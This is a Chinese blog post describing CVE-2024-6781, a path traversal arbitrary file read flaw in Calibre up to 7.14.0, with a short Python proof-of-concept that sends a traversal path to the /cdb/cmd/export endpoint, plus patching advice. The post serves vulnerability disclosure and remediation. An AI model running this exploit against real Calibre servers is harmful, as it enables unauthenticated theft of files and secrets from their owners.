Calibre任意文件读取漏洞(CVE-2024-6781)

最新推荐文章于 2025-12-13 11:21:53 发布
原创 最新推荐文章于 2025-12-13 11:21:53 发布 · 228 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #漏洞复现 #安全威胁分析 #web安全 #漏洞利用 #漏洞库

漏洞概述

CVE-2024-6781 是 Calibre 软件中的一个任意文件读取漏洞。该漏洞允许攻击者通过构造特定的请求,读取服务器上的任意文件,可能导致敏感信息泄露。

漏洞影响

该漏洞影响 Calibre 的多个版本,具体受影响的版本范围需要参考官方公告。攻击者可以利用该漏洞读取服务器上的配置文件、日志文件、数据库文件等,进而获取敏感信息。

影响版本

Calibre <= 7.14.0 中的路径遍历允许未经身份验证的攻击者实现任意文件读取。

poc

#! /usr/bin/env python3
# Ldwk
# PoC for: CVE-2024-6781
import json
import sys

import requests

_target = "http://localhost:8080" # SET ME
_book_id = 1 # ensure book_id exists

def exploit(path):
    r = requests.post(
        f"{_target}/cdb/cmd/export",
        headers={"Content-Type": "application/json"},
        json=["extra_file", _book_id, path, ""],
    )
    try:
        print(r.json()["result"])
    except Exception:
        print(r.text)

if __name__ == "__main__":
    exploit("..\\..\\..\\Calibre Settings\\gui.json")

修复建议

为了修复该漏洞,建议采取以下措施:

  1. 更新到最新版本的 Calibre 软件,官方通常会在新版本中修复已知的安全漏洞。
  2. 对用户输入进行严格的验证和过滤,防止路径遍历攻击。
  3. 限制服务器文件的访问权限,确保只有必要的文件可以被读取。
Fastadmin框架短视频知识付费系统存在任意文件读取漏洞
缘梦未来的博客
11-24 435
FastAdmin框架短视频系统/视频知识付费源码/附带小说系统系统视频支持包月、单独购买、观影卷等功能源码附带小说系统源码需要配置高服务器和VDN加速
Calibre 存在任意文件读取漏洞(CVE-2024-6781)
缘梦未来的博客
12-11 372
Calibre 是一款功能强大且开源的电子书管理软件,广泛用于管理、组织和阅读电子书。它支持多种电子书格式,并为用户提供了全面的电子书转换、编辑和同步功能。Calibre 是跨平台的,适用于 Windows、macOS 和 Linux。
HW漏洞威胁情报第十五天|HW情报
weixin_43167326的博客
08-08 1451
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
Calibre远程代码执行漏洞(CVE-2024-6782)
swordheart的博客
05-16 342
CVE-2024-6782是一个影响Calibre软件的远程代码执行漏洞Calibre是一款广泛使用的电子书管理工具,该漏洞可能允许攻击者在受影响的系统上执行任意代码,从而可能导致数据泄露、系统控制或其他恶意行为。
搭建个人移动图书馆——Calibre-web
Feng_8071的博客
11-29 7622
一、前言 之前看到同学那里用群晖搭了个移动图书馆,而自己也有个云服务器,所以借此用在云端搭建移动图书馆,用来存储名著、计算机书籍以及其他书籍等。于是,查找相关的资料,决定用Calibre-web的二进制方式进行安装。 Calibre 是一位印度大佬编写并维护的电子书管理软件,集成了电子书管理、分类、编辑、转换、搜索等等所有能想到的功能 二、安装过程 2.1 Calibre下载 sudo -v && wget -nv -O- https://download.calibre-ebook.com
Calibre 存在RCE漏洞(CVE-2024-6782)
缘梦未来的博客
12-11 456
Calibre 是一款功能强大且开源的电子书管理软件,广泛用于管理、组织和阅读电子书。它支持多种电子书格式,并为用户提供了全面的电子书转换、编辑和同步功能。Calibre 是跨平台的,适用于 Windows、macOS 和 Linux。
最新任意文件读取 下载漏洞总结_任意文件下载漏洞(1)2024年最新华为网络安全面试真题解析
2401_84132544的博客
05-14 1110
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
2024年个人网络安全研究存档库_包含Apache_OFBiz_CVE-2024-38856_Calibre_任意文件读取_CMSV6_弱密码_H3C_iMC_反序列化_RCE_青.zip
09-03
2024年个人网络安全研究存档库_包含Apache_OFBiz_CVE-2024-38856_Calibre_任意文件读取_CMSV6_弱密码_H3C_iMC_反序列化_RCE_青.zip
Calibre-Web使用docker-compose安装需要的yml配置文件
12-05
首先,要使用Docker-compose来部署Calibre-Web,用户需要准备一个名为docker-compose.yml的配置文件,这是Docker-compose默认寻找的配置文件名。在这个文件中,用户需要指定Calibre-Web镜像的来源、服务运行的端口...
精选资源
calibre-portable-installer-5.3.0电子书阅读器便携版
01-19
calibre-portable-installer-5.3.0,一款兼容所有格式的电子书阅读器
从一次增删改操作开始:彻底理解 MySQL Buffer Pool 的地位与作用
soft2001525的博客
12-11 1677
它是 InnoDB 的核心内存引擎,是所有数据读写的唯一入口,是数据库性能与安全性的关键支撑。理解 Buffer Pool 的逻辑,你就理解了 MySQL 的一半。redo logundo log(事务回滚)MVCC脏页、刷盘策略自适应哈希索引B+树索引加载机制查询优化都与 Buffer Pool 有直接关系。如果你想系统搞懂 MySQL,从 Buffer Pool 开始是最佳路径。如果本篇文章对你有帮助,欢迎:✏️ 评论交流。
Qt6.5.3 mingw64 Ninja编译oracle oci驱动
小蝈蝈的博客
12-12 377
2.将sdk和basic的内容复制到一起,basic中的instantclient_xx_x目录下的内容,sdk的instantclient_xx_xx目录下的内容。├── include/ ← 头文件(来自 sdk/include)到 自己的项目的运行路径下的**/plugins/sqldrivers/**└── sdk/ ← 原始目录(可保留,但非必需)3.将oci.dll生成mingw64支持的.a库。4.切换到Qt源码中的路径下,我的路径。
小白安装Redis
2201_75999403的博客
12-11 567
简单亲测无痛安装redis
Windows 64位安装MySQL5.7.44
宁德的小码农
12-09 574
本文提供了MySQL 5.7.44 64位版本在Windows系统下的详细安装配置指南。主要内容包括:从官方下载MySQL压缩包并解压到指定目录;创建my.ini配置文件,包含字符集设置、性能优化参数、日志配置等关键选项;通过命令行初始化数据库并记录临时密码;安装MySQL服务并启动;使用临时密码登录后修改root密码;最后验证分区模块是否启用。配置文件中特别优化了InnoDB缓冲池大小、查询缓存等参数,适合中大型应用场景,同时提供了日志记录和严格SQL模式等安全设置。
java面试:怎么保证消息队列当中的消息丢失、重复问题?
2301_80939853的博客
12-11 894
在面试的过程之中,假设你在简历当中填写了mq的相关技术,那面试官大概率会考察这方面的问题来看看你对mq相关知识的掌握程度,小编在这一块也被拷打过,今天就和大家一起来了解一下这方面的知识,希望大家都有所提升。
Oracle数据泵导入导出数据
雷神乐乐的博客
12-10 222
Oracle数据泵导入导出数据
实习面试题-Redis 面试题
最新发布
CXY00000的博客
12-13 34
Redis主从复制实现原理分为三个阶段:1)全量同步阶段,从节点首次连接主节点时,主节点生成RDB快照并发送给从节点,同时将期间新写入命令暂存到replication buffer;2)命令传播阶段,主节点异步发送写命令给从节点;3)增量同步阶段,通过repl_backlog_buffer环形缓冲区实现断线后的部分数据同步。主从架构实现了读写分离和数据备份。 Redis集群采用哈希槽分片(16384个槽)、Gossip协议和去中心化设计。数据根据CRC16(key)%16384分配到不同节点,客户端通过MO
SNMP设备数据 转 IEC104项目案例
仰科网关
12-11 733
VFBOX协议转换网关支持PLC,modbus,EthernetIP,Profinet,CCLink,EtherCAT,IEC61850,IEC104,bacnet,DLT645,HJ212,opc ua,opc da,DNP3。
springboot 1.54 双redis连接池 配置和使用
stregeditor的程序人生
12-12 698
事情原因 我手上主redis 内存不大 ,不想迁移了,重新配置一台redis做额外计算使用,所以打算修改服务增加第二个redis连接配置 ,把新增需求放在第二个redis上计算,废话就不多说,上图和代码。@Qualifier("averageRedisTemplate") // 新增:用于平均值计算的Redis。@Qualifier("rediskqxsTemplate") // 原Redis。// 第二个Redis配置(平均值Redis)// 第一个Redis配置(原Redis)
Calibre-Web: 管理和分享您的电子书库
资源摘要信息:"calibre-web是一个开源的Web应用程序,旨在提供一个简洁的界面,用于浏览、阅读和下载存储在Calibre数据库中的电子书。Calibre是一个流行的电子书管理软件,而calibre-web则是基于Calibre的一个便捷...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值